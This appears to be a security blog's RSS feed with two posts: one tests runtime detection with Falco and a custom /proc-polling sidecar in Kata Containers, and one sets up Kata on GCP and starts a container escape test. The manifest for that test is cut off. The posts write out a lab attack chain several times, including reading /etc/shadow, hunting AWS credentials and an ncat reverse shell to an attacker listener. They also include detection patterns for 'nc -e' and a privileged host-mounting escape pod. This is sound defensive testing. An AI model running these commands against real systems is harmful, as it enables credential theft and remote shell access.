<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[CloudSecBurrito]]></title><description><![CDATA[A hands-on look at the tools behind modern security — cloud-native, open source, and everything in between.]]></description><link>https://cloudsecburrito.com</link><image><url>https://cdn.hashnode.com/res/hashnode/image/upload/v1748931377248/7982496c-2dd7-4886-936e-14682980484b.png</url><title>CloudSecBurrito</title><link>https://cloudsecburrito.com</link></image><generator>RSS for Node</generator><lastBuildDate>Wed, 08 Apr 2026 14:10:15 GMT</lastBuildDate><atom:link href="https://cloudsecburrito.com/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Runtime Security in Kata: Less Visibility, Better Signal]]></title><description><![CDATA[Kata containers give you a stronger boundary. That is the point.
But that boundary also breaks a lot of the assumptions we rely on for runtime security. The usual model works because containers share ]]></description><link>https://cloudsecburrito.com/runtime-security-in-kata-less-visibility-better-signal</link><guid isPermaLink="true">https://cloudsecburrito.com/runtime-security-in-kata-less-visibility-better-signal</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[virtual machine]]></category><category><![CDATA[kata]]></category><category><![CDATA[Security]]></category><category><![CDATA[containers]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Thu, 02 Apr 2026 02:18:12 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/0cc0cd3f-2696-4e4a-af6c-8ff94d0ecad1.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Kata containers give you a stronger boundary. That is the point.</p>
<p>But that boundary also breaks a lot of the assumptions we rely on for runtime security. The usual model works because containers share a kernel. You get visibility from the host, you stream syscalls, and you build detections on top of that.</p>
<p>Kata changes that.</p>
<p>Now there is a guest kernel in the way, and “just look at the host” stops being enough. At some point, adding more host-level telemetry does not help. You are just looking harder from the wrong side of the wall.</p>
<p>So instead of trying to force the usual model to fit, I went in the other direction: figure out what actually matters inside the workload and build around that.</p>
<p>This post does two things:</p>
<ol>
<li><p>Show the normal runtime-security model with a quick Falco sanity check in a standard container and then in Kata.</p>
</li>
<li><p>Show why the answer in Kata is not “get every syscall back,” but “collect the right signals from inside the workload boundary.”</p>
</li>
</ol>
<hr />
<h2>Diagrams</h2>
<h3>What you would need if you insisted on the old model</h3>
<img src="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/769a6f2d-13ea-49a4-8d5a-42eae17c29aa.png" alt="" style="display:block;margin:0 auto" />

<p>This is the awkward reality in Kata. The workload sits behind a guest kernel, so host Falco is no longer observing the workload the same way it would in a shared-kernel container runtime. If you want syscall-centric visibility all the way through, you start drifting toward a two-layer model: one perspective in the guest, one on the host, and a lot more complexity than “just deploy Falco.”</p>
<h3>The model we actually care about</h3>
<img src="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/b8f26ddc-7e3f-419d-af80-de55325d7677.png" alt="" style="display:block;margin:0 auto" />

<p>This is the practical model. Keep the host boundary intact. Do not try to recreate a full runtime platform inside the guest. Put a small agent next to the workload, capture a handful of high-signal behaviors, and ship them somewhere useful.</p>
<hr />
<h2>Quick reset: what actually changed</h2>
<p>In a normal Kubernetes setup:</p>
<ul>
<li><p>containers share the host kernel</p>
</li>
<li><p>syscalls are visible from the host</p>
</li>
<li><p>runtime detection lives comfortably at that layer</p>
</li>
</ul>
<p>That is why tools like Falco work so well in standard container environments. The observation point matches the workload.</p>
<p>With Kata:</p>
<ul>
<li><p>each pod runs inside its own lightweight VM</p>
</li>
<li><p>syscalls terminate inside the guest kernel</p>
</li>
<li><p>the host sees less, and sometimes sees it differently</p>
</li>
</ul>
<p>The important part is not just “less visibility.” It is that the <strong>observation point moved</strong>. A Kata pod is not just a more isolated container. It is a workload running behind its own kernel boundary. That means host-level runtime tooling is no longer standing in the same place relative to the process you care about.</p>
<hr />
<h2>Lightning baseline: Falco on a normal container</h2>
<p>Before arguing with the model, it is worth doing the easy sanity check.</p>
<h3>Fast deploy</h3>
<p>Quick and dirty Falco deploy.</p>
<pre><code class="language-bash">helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update

helm upgrade --install falco falcosecurity/falco \
  -n falco \
  --create-namespace \
  --set falcosidekick.enabled=true \
  --set falcosidekick.webui.enabled=true
</code></pre>
<p>That is enough for a quick lab check. No giant tuning exercise. No twenty-page values file. Just get Falco running and confirm the standard model still behaves like the standard model.</p>
<h3>Test workload</h3>
<p>A plain container is enough:</p>
<pre><code class="language-yaml">apiVersion: v1
kind: Pod
metadata:
  name: normal-app
  namespace: default
  labels:
    app: normal-app
spec:
  restartPolicy: Never
  containers:
    - name: app
      image: debian:stable-slim
      command: ["/bin/sh", "-c"]
      args:
        - |
          apt-get update &amp;&amp; apt-get install -y procps findutils &amp;&amp; \
          sleep 3600
</code></pre>
<p>Apply it:</p>
<pre><code class="language-bash">kubectl apply -f normal-pod.yaml
</code></pre>
<h3>A mini attack chain worth testing</h3>
<p>For this comparison, let’s not just “spawn a shell.” Let’s try a sequence of events:</p>
<ol>
<li><p>exec in</p>
</li>
<li><p>read sensitive file</p>
</li>
<li><p>browse for aws creds</p>
</li>
<li><p>install ncat</p>
</li>
<li><p>spawn reverse shell</p>
</li>
</ol>
<p>That gives you a decent mini attack chain.</p>
<p>Example:</p>
<pre><code class="language-bash">kubectl exec -it normal-app -- /bin/bash

# inside the container
cat /etc/shadow
find / -iname ".aws/credentials" 2&gt;/dev/null
apt install ncat -y
ncat --exec /bin/sh 10.244.0.1 4444 #run nc -lvnp 4444 from attacker machine
</code></pre>
<h3>What you expect to see</h3>
<p>In a standard container runtime, Falco is in its natural habitat. Assuming Falco defaults, you should see signal around sensitive file access, AWS credential discovery, dropping a new binary, and launching a reverse shell. The exact rules that fire can vary a bit, but the main point is simple:</p>
<blockquote>
<p>in a shared-kernel container, host-level syscall monitoring lines up with the workload you are testing</p>
</blockquote>
<p>No mystery. No special pleading. The baseline works, as this snippet from Falcosidekick shows.</p>
<img src="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/65251ace-bb2e-4690-acdd-28a253c2379a.png" alt="" style="display:block;margin:0 auto" />

<h3>Run the same thing in Kata</h3>
<p>Now take basically the same pod and move it to Kata:</p>
<pre><code class="language-yaml">apiVersion: v1
kind: Pod
metadata:
  name: kata-app
  namespace: default
  labels:
    app: kata-app
spec:
  runtimeClassName: kata-qemu
  restartPolicy: Never
  containers:
    - name: app
      image: debian:stable-slim
      command: ["/bin/sh", "-c"]
      args:
        - |
          apt-get update &amp;&amp; apt-get install -y netcat-openbsd procps findutils &amp;&amp; \
          sleep 3600
</code></pre>
<p>Apply it:</p>
<pre><code class="language-bash">kubectl apply -f kata-pod.yaml
</code></pre>
<p>Then run the same sequence:</p>
<pre><code class="language-bash">kubectl exec -it kata-app -- /bin/bash

# inside the container
cat /etc/shadow
find / -iname ".aws/credentials" 2&gt;/dev/null
apt install ncat -y
ncat --exec /bin/sh 10.244.0.1 4444 #run nc -lvnp 4444 from attacker machine
</code></pre>
<p>And you'll see nothing. The workload is now behind a guest kernel. That means the host Falco sensor is no longer seeing the same direct syscall stream it gets in a normal container model.</p>
<p>But here is the point.</p>
<blockquote>
<p>This is not a Falco failure, and it is not a Kata bug. This is the boundary doing its job.</p>
</blockquote>
<p>Kata is supposed to change the isolation model. If the runtime boundary changes, the detection model has to change with it.</p>
<hr />
<h2>Why I am not going to put Falco inside Kata</h2>
<p>This is where the line starts to matter. Could you try to push harder on syscall-centric detection inside Kata? Sure.</p>
<p>You could put Falco into the container. But I don't think the juice is worth the squeeze.</p>
<p>I am not working with a giant production fleet here. This is a sandboxed workload, not a sea of hundreds of ordinary containers. I do not have the luxury of just collecting everything and tuning it forever. And more importantly, Kata is not trying to be “regular containers, but a little stronger.” It is a different boundary with different tradeoffs.</p>
<p>So my question changes too.</p>
<p>Instead of asking:</p>
<ul>
<li><p>how do I get all my syscalls back?</p>
</li>
<li><p>how do I make Falco see everything it used to see?</p>
</li>
</ul>
<p>I am asking:</p>
<blockquote>
<p>what do I actually need to observe, from inside this workload, to know something meaningful is happening?</p>
</blockquote>
<p>That leads to a much smaller and much more defensible list:</p>
<ul>
<li><p>shell execution</p>
</li>
<li><p>recon behavior</p>
</li>
<li><p>installing new binaries</p>
</li>
<li><p>reverse shell</p>
</li>
<li><p>suspicious outbound connections</p>
</li>
<li><p>process chains that look like an attack rather than normal app behavior</p>
</li>
</ul>
<p>That is the design center for the micro-agent. Just enough signal, from the right side of the boundary, to tell me when a sandboxed workload starts acting like an attacker lives there now.</p>
<hr />
<h2>The micro-agent: less visibility, actual signal</h2>
<p>The <a href="https://github.com/sf-matt/theburrito/tree/main/kata-microagent">micro-agent</a> is deliberately simple:</p>
<ul>
<li><p>it runs as a sidecar inside the Kata pod</p>
</li>
<li><p>it polls <code>/proc</code> for running processes</p>
</li>
<li><p>it applies a small set of rules focused on high-signal behavior</p>
</li>
<li><p>it ships events to a lightweight receiver with a UI</p>
</li>
</ul>
<p>That’s it. No kernel hooks. No syscall stream. No attempt to reconstruct the host view. Instead, it answers a narrower question:</p>
<blockquote>
<p>what is this workload actually doing right now?</p>
</blockquote>
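<p>For a concrete picture, the heart of that poll loop fits in a few lines of shell. This is a sketch under my own assumptions, not the actual agent code (that lives in the repo linked above):</p>
<pre><code class="language-bash"># One scan of /proc: print "PID cmdline" for every visible process.
scan_procs() {
  for dir in /proc/[0-9]*; do
    pid=${dir#/proc/}
    # cmdline is NUL-separated; turn NULs into spaces. Kernel threads are empty.
    cmd=$(tr '\0' ' ' &lt; "$dir/cmdline" 2&gt;/dev/null)
    if [ -n "$cmd" ]; then
      printf '%s %s\n' "$pid" "$cmd"
    fi
  done
}

# The agent wraps this in a loop: scan, apply rules, sleep POLL_INTERVAL, repeat.
scan_procs
</code></pre>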
<h3>What it looks for</h3>
<p>The detection model maps directly to the behaviors I actually care about:</p>
<ul>
<li><p>shell execution inside the workload</p>
</li>
<li><p>access to sensitive files (<code>/etc/shadow</code>)</p>
</li>
<li><p>credential discovery (<code>.aws/credentials</code>)</p>
</li>
<li><p>package manager usage (<code>apt-get install</code>, <code>apk add</code>, etc.)</p>
</li>
<li><p>execution of newly introduced binaries</p>
</li>
<li><p>network utilities used for remote execution (<code>ncat --exec</code>, <code>nc -e</code>)</p>
</li>
</ul>
<p>This is not exhaustive. It is intentionally selective. Each rule is simple:</p>
<ul>
<li><p>match a process name</p>
</li>
<li><p>optionally match a command-line pattern</p>
</li>
<li><p>emit a structured event</p>
</li>
</ul>
<p>For example:</p>
<ul>
<li><p><code>cat /etc/shadow</code> → <code>shadow_file_access</code></p>
</li>
<li><p><code>apt-get install -y ncat</code> → <code>package_manager_execution</code></p>
</li>
<li><p><code>ncat --exec /bin/sh ...</code> → <code>nc_execution</code></p>
</li>
</ul>
<p>No magic. Just picking signals that actually mean something.</p>
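<p>As a sketch, that rule shape can be approximated with a shell <code>case</code> statement. The event names mirror the ones above, but this is illustrative, not the agent's real implementation:</p>
<pre><code class="language-bash"># Toy rule matcher: map a command line to an event name, if any rule hits.
classify() {
  case "$1" in
    *"/etc/shadow"*)                  echo shadow_file_access ;;
    *".aws/credentials"*)             echo aws_credential_discovery ;;
    *"apt-get install"*|*"apt install"*|*"apk add"*)
                                      echo package_manager_execution ;;
    *"ncat --exec"*|*"nc -e"*)        echo nc_execution ;;
  esac
}

classify "cat /etc/shadow"              # shadow_file_access
classify "apt-get install -y ncat"      # package_manager_execution
classify "sleep 3600"                   # no output: benign
</code></pre>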
<h3>Approximating “drop and execute”</h3>
<p>Falco can tell you that a binary came from the container’s writable layer. Inside the workload, I do not have that context. No overlayfs view. No runtime metadata.</p>
<p>So I approximate it:</p>
<ol>
<li><p>build a baseline of executable paths when the container starts</p>
</li>
<li><p>watch for new processes</p>
</li>
<li><p>if a process executes a binary that was not present at startup, flag it</p>
</li>
</ol>
<p>That becomes:</p>
<ul>
<li><code>post_start_binary_execution</code></li>
</ul>
<p>It is not perfect. It does not know <em>why</em> the binary is new. But it captures what matters:</p>
<blockquote>
<p>something showed up after startup, and now it is running</p>
</blockquote>
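<p>The heuristic itself is just snapshot-and-diff, which can be sketched in shell (illustrative only; the paths and function names here are mine, not the agent's):</p>
<pre><code class="language-bash"># Snapshot every executable under a root, sorted so diffs are stable.
snapshot_execs() {
  find "$1" -xdev -type f -perm -u+x 2&gt;/dev/null | sort
}

baseline=$(mktemp)
snapshot_execs /usr/bin &gt; "$baseline"   # taken once, at container start

# Later scans: anything executable now that was absent at startup is a
# candidate for post_start_binary_execution.
new_binaries() {
  snapshot_execs "$1" | comm -13 "$baseline" -
}
new_binaries /usr/bin   # empty immediately after the snapshot
</code></pre>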
<hr />
<h2>Running the same attack chain</h2>
<p>So now I run the same Kata app, but with the sensor.</p>
<pre><code class="language-yaml">apiVersion: v1
kind: Pod
metadata:
  name: kata-app
  namespace: kata-demo
  labels:
    app: kata-app
spec:
  runtimeClassName: kata-qemu
  shareProcessNamespace: true
  restartPolicy: Never
  containers:
    - name: app
      image: debian:stable-slim
      imagePullPolicy: Always
      command: ["/bin/sh", "-c"]
      args:
        - |
          sleep 3600

    - name: sensor
      image: sfmatt/kata-sensor:latest
      imagePullPolicy: Always
      env:
        - name: RECEIVER_URL
          value: "http://kata-receiver.kata-demo.svc.cluster.local/events"
        - name: POLL_INTERVAL
          value: "2"
        - name: HEARTBEAT_INTERVAL
          value: "15"
        - name: MODE
          value: "kata"
        - name: EXPECTED_PROCESSES
          value: "sleep"
        - name: POD_NAME
          valueFrom:
            fieldRef:
              fieldPath: metadata.name
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
</code></pre>
<p>And I run the receiver (a poor man's Falcosidekick) as well.</p>
<pre><code class="language-yaml">apiVersion: v1
kind: Namespace
metadata:
  name: kata-demo
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: kata-receiver
  namespace: kata-demo
spec:
  replicas: 1
  selector:
    matchLabels:
      app: kata-receiver
  template:
    metadata:
      labels:
        app: kata-receiver
    spec:
      containers:
        - name: receiver
          image: sfmatt/kata-receiver:latest
          imagePullPolicy: Always
          ports:
            - containerPort: 8080
---
apiVersion: v1
kind: Service
metadata:
  name: kata-receiver
  namespace: kata-demo
spec:
  type: NodePort
  selector:
    app: kata-receiver
  ports:
    - name: http
      port: 80
      targetPort: 8080
      nodePort: 30080
</code></pre>
<p>Apply these. With the sensor pod and receiver running, I execute the same attack chain inside the container, with a couple of steps kept long-running (<code>tail -f</code> instead of <code>cat</code>, a looping <code>find</code>) so the polling sensor has a chance to observe them:</p>
<pre><code class="language-bash">kubectl exec -it -n kata-demo kata-app -- /bin/bash

# inside the container
tail -f /etc/shadow
sh -c 'while true; do find / -path "*/.aws/credentials" 2&gt;/dev/null; sleep 1; done'
apt update &amp;&amp; apt install ncat -y
ncat --exec /bin/sh 10.244.0.1 4444 # run nc -lvnp 4444 from attacker machine
</code></pre>
<p>And the output is exactly what I need:</p>
<ol>
<li><p><code>unexpected_shell</code></p>
</li>
<li><p><code>shadow_file_access</code></p>
</li>
<li><p><code>aws_credential_discovery</code></p>
</li>
<li><p><code>package_manager_execution</code></p>
</li>
<li><p><code>post_start_binary_execution</code></p>
</li>
<li><p><code>nc_execution</code></p>
</li>
</ol>
<img src="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/04efc02b-290d-4338-9629-ba26dedb0a44.png" alt="" style="display:block;margin:0 auto" />

<p>That’s the whole story. No massive ruleset. Six events. This is not about replacing Falco. It is about proving a different point:</p>
<blockquote>
<p>inside a sandboxed workload, you can still get meaningful runtime signal without rebuilding full system visibility</p>
</blockquote>
<p>The signal is smaller. The implementation is simpler. But the outcome is still useful.</p>
<h3>Perfect is the enemy of the good</h3>
<p>There are obvious gaps:</p>
<ol>
<li><p>this is polling-based</p>
</li>
<li><p>fast, short-lived processes can be missed</p>
</li>
<li><p>there is no kernel-level visibility</p>
</li>
<li><p>“new binary” detection is a heuristic, not ground truth</p>
</li>
<li><p>this hasn’t been hardened or security tested</p>
</li>
</ol>
<p>But those tradeoffs are intentional. I’m not trying to rebuild the host from inside the guest. I’m trying to answer a simpler question:</p>
<blockquote>
<p>does this workload look like it just got compromised?</p>
</blockquote>
<p>And for this scenario, six signals is enough to answer that with confidence.</p>
<hr />
<h2>Wrapup</h2>
<p>This is a starting point, not an endpoint. Zooming out:</p>
<ul>
<li><p>what is the minimal detection model that actually works across sandboxed runtimes?</p>
</li>
<li><p>which signals survive isolation boundaries consistently?</p>
</li>
<li><p>how do you combine admission + runtime + workload-local context into something coherent?</p>
</li>
</ul>
<p>I don’t think the answer is “just run Falco inside the guest.” This isn’t about seeing everything. It’s about seeing enough. Kata changes the boundary, so the detection model has to change too. And once you accept that, the problem gets smaller.</p>
<p>It’s a bit like watching your kid in a sandbox. You’re not responsible for the whole park, the playground, and every other kid running around. You’re focused on a small, defined space. If something weird happens in that sandbox, you’ll notice.</p>
<p>From experience, that’s a much more manageable problem.</p>
<p>And inside a sandboxed workload, that’s really the point. You don’t need global visibility. You need confidence that the thing in front of you isn’t starting to behave like something it shouldn’t.</p>
]]></content:encoded></item><item><title><![CDATA[Kata Containers: When "Container Escape" Stops Working]]></title><description><![CDATA[I wanted to try Kata Containers. Not in a "read the docs and feel informed" way, but in a burrito way. Which of course means: run it, break it, and see what actually changes.
Because on paper, Kata so]]></description><link>https://cloudsecburrito.com/kata-containers-when-container-escape-stops-working</link><guid isPermaLink="true">https://cloudsecburrito.com/kata-containers-when-container-escape-stops-working</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[kata]]></category><category><![CDATA[Security]]></category><category><![CDATA[containers]]></category><category><![CDATA[QEMU]]></category><category><![CDATA[virtual machine]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Wed, 25 Mar 2026 20:01:25 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/28e2e33a-27e9-43c8-9e96-b94585d7ad3c.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>I wanted to try Kata Containers. Not in a "read the docs and feel informed" way, but in a burrito way. Which of course means: run it, break it, and see what actually changes.</p>
<p>Because on paper, Kata sounds like the answer to a question we've mostly hand-waved: <em>what if containers weren't just sharing the same kernel and hoping for the best?</em></p>
<p>So I did what I always do: spun up a quick Kubernetes lab, installed the runtime, applied a <code>RuntimeClass</code>, and waited for my pod to come up. It didn't. It just sat there. <code>ContainerCreating</code>. Mocking me. No obvious misconfig, no broken YAML, just enough of an error to suggest something deeper was wrong and not enough to tell me what.</p>
<p>After a bit of digging, the problem became clear: I wasn't missing configuration. I was missing a hypervisor. More specifically, I was trying to run VM-backed containers on infrastructure that had absolutely no intention of letting me run a VM inside it. My local lab VM? Not a chance. Apple Silicon says no.</p>
<p>So instead of fighting the environment, I changed it. I spun up a GCP instance with nested virtualization enabled and tried again. Same Kubernetes setup. Same RuntimeClass. Completely different result.</p>
<p>And that's when things finally started to work. But getting Kata running turned out to be the easy part. Understanding what it actually <em>changes</em>, especially for container security, is where things get interesting.</p>
<hr />
<h2>Diagram</h2>
<img src="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/55144801-56ec-4261-90ed-320643d9f7aa.png" alt="" style="display:block;margin:0 auto" />

<p>This diagram shows the key difference between standard containers and Kata. In a normal setup, containers share the host kernel, which is why escapes can reach the node. With Kata, the workload runs inside a microVM with its own guest kernel, backed by KVM. The result is simple: the isolation boundary moves. Instead of going straight to the host, an escape attempt hits the VM boundary first.</p>
<hr />
<h2>Kata Containers Local Lab Failure</h2>
<p>I started by installing Kata directly into my Kubernetes lab using the official Helm chart. On the surface, everything looked fine.</p>
<p>The chart installed cleanly:</p>
<pre><code class="language-console">export VERSION=$(curl -sSL https://api.github.com/repos/kata-containers/kata-containers/releases/latest | jq .tag_name | tr -d '"')
export CHART="oci://ghcr.io/kata-containers/kata-deploy-charts/kata-deploy"
helm install kata-deploy "${CHART}" --version "${VERSION}"
</code></pre>
<p>A <code>kata-deploy</code> DaemonSet showed up, and RuntimeClasses were created:</p>
<pre><code class="language-console">matt@ciliumcontrolplane:~$ kubectl get runtimeclass
NAME                            HANDLER                         AGE
kata-clh                        kata-clh                        37s
kata-cloud-hypervisor           kata-cloud-hypervisor           37s
kata-dragonball                 kata-dragonball                 37s
kata-fc                         kata-fc                         37s
...
</code></pre>
<p>At this point, it looked like Kata was ready to go.</p>
<h4>Failure 1: kata-deploy installer issues</h4>
<p>The <code>kata-deploy</code> pod was not actually completing successfully. Its logs showed:</p>
<pre><code class="language-console">[2026-03-19T23:05:55Z INFO  kata_deploy::artifacts::install] Generating drop-in configuration files for shim: clh
[2026-03-19T23:05:55Z INFO  kata_deploy::artifacts::install] Setting up runtime directory for shim: cloud-hypervisor
Error: Configuration file not found: "/host/opt/kata/share/defaults/kata-containers/runtime-rs/runtimes/cloud-hypervisor/configuration-cloud-hypervisor.toml". This file should have been symlinked from the original config. Check that the shim 'cloud-hypervisor' has a valid configuration file in the artifacts.
</code></pre>
<p>The installer was attempting to configure multiple hypervisor shims, including <code>cloud-hypervisor</code>, but the expected configuration artifacts were not present. This meant the node was never fully prepared for Kata, even though Kubernetes objects like RuntimeClass were already created.</p>
<p>The fix is to stop trying to install everything and just enable a single, known-good shim. Create a Helm override file (<code>kata-override.yaml</code>):</p>
<pre><code class="language-yaml">shims:
  disableAll: true
  qemu:
    enabled: true
defaultShim:
  amd64: qemu
  arm64: qemu
</code></pre>
<p>Then reinstall the chart with the override:</p>
<pre><code class="language-console">helm uninstall kata-deploy

helm install kata-deploy "${CHART}" \
  --version "${VERSION}" \
  -f kata-override.yaml
</code></pre>
<p>Voilà! Now the installer skips the problematic shims, completes cleanly, and you finally have a usable kata-qemu runtime.</p>
<p>So now let's deploy a simple test pod using our kata-qemu runtime class:</p>
<pre><code class="language-yaml">apiVersion: v1
kind: Pod
metadata:
  name: kata-test
spec:
  runtimeClassName: kata-qemu
  containers:
    - name: nginx
      image: nginx:stable
</code></pre>
<p>Kubernetes accepted the pod and attempted to start it. The pod moved into <code>ContainerCreating</code>, which meant:</p>
<ul>
<li><p>Scheduling worked</p>
</li>
<li><p>The RuntimeClass was recognized</p>
</li>
<li><p>Kubernetes handed execution off to the runtime layer</p>
</li>
</ul>
<p>Then it failed.</p>
<h4>Failure 2: RuntimeClass exists, but runtime does not</h4>
<p>Despite the installer issues, the RuntimeClass still existed. This created a false sense that everything was configured correctly.</p>
<p>When the pod attempted to start, containerd produced the real error:</p>
<pre><code class="language-console">  Warning  FailedCreatePodSandBox  7s (x10 over 2m7s)  kubelet            Failed to create pod sandbox: rpc error: code = Unknown desc = failed to create containerd task: failed to create shim task: Could not create the sandbox resource controller failed to add any hypervisor device to devices cgroup: unknown
</code></pre>
<p>At this point, the problem finally became clear. Kubernetes had done its job. The RuntimeClass was valid. The scheduler placed the pod. Kata even got far enough to try launching the sandbox. But when it came time to actually create the VM-backed workload, the runtime had nothing to attach.</p>
<p>There was no usable hypervisor device. No <code>/dev/kvm</code>. No hardware-backed virtualization exposed to the node. Just a container runtime being asked to spin up a VM on infrastructure that fundamentally couldn’t support it.</p>
<p>And that’s a real requirement for Kata. Not just Kubernetes. Not just containerd. Actual access to virtualization through KVM.</p>
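<p>A quick preflight on the node would have saved me the detour. This is an illustrative check of my own, not anything kata-deploy ships (it presumably does its own, more thorough probing):</p>
<pre><code class="language-bash"># Is hardware virtualization actually exposed to this node?
kvm_ready() {
  [ -e /dev/kvm ] &amp;&amp; grep -qE 'vmx|svm' /proc/cpuinfo
}

if kvm_ready; then
  echo "KVM present: VM-backed pods can start"
else
  echo "no usable hypervisor: Kata pods will stall in ContainerCreating"
fi
</code></pre>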
<hr />
<h2>GCP Fix</h2>
<p>Getting Kata to actually run came down to one thing: giving it a real hypervisor.</p>
<p>I landed on GCP for this. Not because I suddenly became a GCP fan, but because it’s relatively straightforward, reasonably priced, and doesn’t fight you too much when you ask for nested virtualization. More importantly, it’s easy to spin up and tear down with Terraform, which makes the whole experiment repeatable instead of a one-off science project.</p>
<p>The setup itself is not complicated, but it is very particular. You need a machine that actually supports virtualization features. I used an <code>n2-standard-4</code> with an Intel Cascade Lake CPU and Ubuntu, which is enough for a small lab.</p>
<p>The important part is enabling <a href="https://docs.cloud.google.com/compute/docs/instances/nested-virtualization/enabling">nested virtualization</a>. Without that, you’re back to the same failure mode as local: everything looks fine, Kubernetes objects exist, but nothing actually works because there’s no hypervisor underneath.</p>
<p>Once nested virtualization is enabled, you finally have what Kata has been quietly asking for the entire time: the ability to run a VM inside your node. At that point, the rest of the setup starts behaving the way the docs promised.</p>
<hr />
<h2>Reproducing the Lab on GCP</h2>
<p>Here is the Terraform I used to set the infra up: <a href="https://github.com/sf-matt/theburrito/tree/main/kata-gcp-k8s-lab">https://github.com/sf-matt/theburrito/tree/main/kata-gcp-k8s-lab</a>. This gets you a small but workable lab with the things Kata actually cares about:</p>
<ul>
<li><p>nested virtualization enabled</p>
</li>
<li><p>Intel Haswell minimum CPU platform</p>
</li>
<li><p>Ubuntu 22.04</p>
</li>
<li><p>Kubernetes installed at boot</p>
</li>
<li><p>Helm installed at boot</p>
</li>
</ul>
<p>Once the instance is up, SSH in. I chose to use SSH-in-browser, but pick your poison.</p>
<h3>Set up kubectl</h3>
<p>Just do the basics.</p>
<pre><code class="language-sh">mkdir -p $HOME/.kube
sudo cp /etc/kubernetes/admin.conf $HOME/.kube/config
sudo chown $(id -u):$(id -g) $HOME/.kube/config
</code></pre>
<h3>Validate the node</h3>
<p>Check a few things:</p>
<ul>
<li><p>Health of node</p>
</li>
<li><p>Presence of <code>/dev/kvm</code></p>
</li>
<li><p>Health of pods</p>
</li>
</ul>
<pre><code class="language-console">matt@kata-k8s-node:~$ kubectl get nodes
NAME            STATUS   ROLES           AGE   VERSION
kata-k8s-node   Ready    control-plane   10m   v1.32.13
matt@kata-k8s-node:~$ ls /dev/kvm 
/dev/kvm
matt@kata-k8s-node:~$ kubectl get po -A
NAMESPACE      NAME                                    READY   STATUS    RESTARTS   AGE
kube-flannel   kube-flannel-ds-wvchr                   1/1     Running   0          11m
kube-system    coredns-668d6bf9bc-2xllc                1/1     Running   0          11m
kube-system    coredns-668d6bf9bc-9vgrm                1/1     Running   0          11m
kube-system    etcd-kata-k8s-node                      1/1     Running   0          11m
kube-system    kube-apiserver-kata-k8s-node            1/1     Running   0          11m
kube-system    kube-controller-manager-kata-k8s-node   1/1     Running   0          11m
kube-system    kube-proxy-4j4sc                        1/1     Running   0          11m
kube-system    kube-scheduler-kata-k8s-node            1/1     Running   0          11m
</code></pre>
<p>Assuming this looks good, you can proceed to setting up Kata.</p>
<h3>Install Kata</h3>
<p>First we set the variables.</p>
<pre><code class="language-console">export VERSION=$(curl -sSL https://api.github.com/repos/kata-containers/kata-containers/releases/latest | jq .tag_name | tr -d '"')
export CHART="oci://ghcr.io/kata-containers/kata-deploy-charts/kata-deploy"
</code></pre>
<p>Then just use Helm to install it.</p>
<pre><code class="language-console">helm install kata-deploy "\({CHART}" --version "\){VERSION}"
</code></pre>
<p>Check runtime classes. There will be a lot.</p>
<pre><code class="language-console">matt@kata-k8s-node:~$ kubectl get runtimeclass
NAME                            HANDLER                         AGE
kata-clh                        kata-clh                        105s
kata-cloud-hypervisor           kata-cloud-hypervisor           105s
kata-dragonball                 kata-dragonball                 105s
kata-fc                         kata-fc                         105s
kata-qemu                       kata-qemu                       105s
kata-qemu-cca                   kata-qemu-cca                   105s
kata-qemu-coco-dev              kata-qemu-coco-dev              105s
kata-qemu-coco-dev-runtime-rs   kata-qemu-coco-dev-runtime-rs   105s
kata-qemu-nvidia-gpu            kata-qemu-nvidia-gpu            105s
kata-qemu-nvidia-gpu-snp        kata-qemu-nvidia-gpu-snp        105s
kata-qemu-nvidia-gpu-tdx        kata-qemu-nvidia-gpu-tdx        105s
kata-qemu-runtime-rs            kata-qemu-runtime-rs            105s
kata-qemu-se                    kata-qemu-se                    105s
kata-qemu-se-runtime-rs         kata-qemu-se-runtime-rs         105s
kata-qemu-snp                   kata-qemu-snp                   105s
kata-qemu-snp-runtime-rs        kata-qemu-snp-runtime-rs        105s
kata-qemu-tdx                   kata-qemu-tdx                   105s
kata-qemu-tdx-runtime-rs        kata-qemu-tdx-runtime-rs        105s
</code></pre>
<hr />
<h2>Test Isolation</h2>
<p>Now on to the obligatory Netshoot container escape test. I previously used this against Talos, where a greatly reduced OS surface limited what an escape could reach. With Kata, we should be able to eliminate even that concern.</p>
<p>The manifest below defines two deployments, one normal and one Kata-backed. Save it as <code>escape.yaml</code>. I've chosen <code>kata-qemu</code> in this case.</p>
<pre><code class="language-yaml">apiVersion: apps/v1
kind: Deployment
metadata:
  name: normal-escape
spec:
  replicas: 1
  selector:
    matchLabels:
      app: normal-escape
  template:
    metadata:
      labels:
        app: normal-escape
        mode: normal
    spec:
      hostPID: true
      containers:
        - name: escape
          image: nicolaka/netshoot:latest
          command: ["sleep", "3600"]
          securityContext:
            privileged: true
          volumeMounts:
            - name: host-root
              mountPath: /host
      volumes:
        - name: host-root
          hostPath:
            path: /
            type: Directory
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: kata-escape
spec:
  replicas: 1
  selector:
    matchLabels:
      app: kata-escape
  template:
    metadata:
      labels:
        app: kata-escape
        mode: kata
    spec:
      runtimeClassName: kata-qemu
      hostPID: true
      containers:
        - name: escape
          image: nicolaka/netshoot:latest
          command: ["sleep", "3600"]
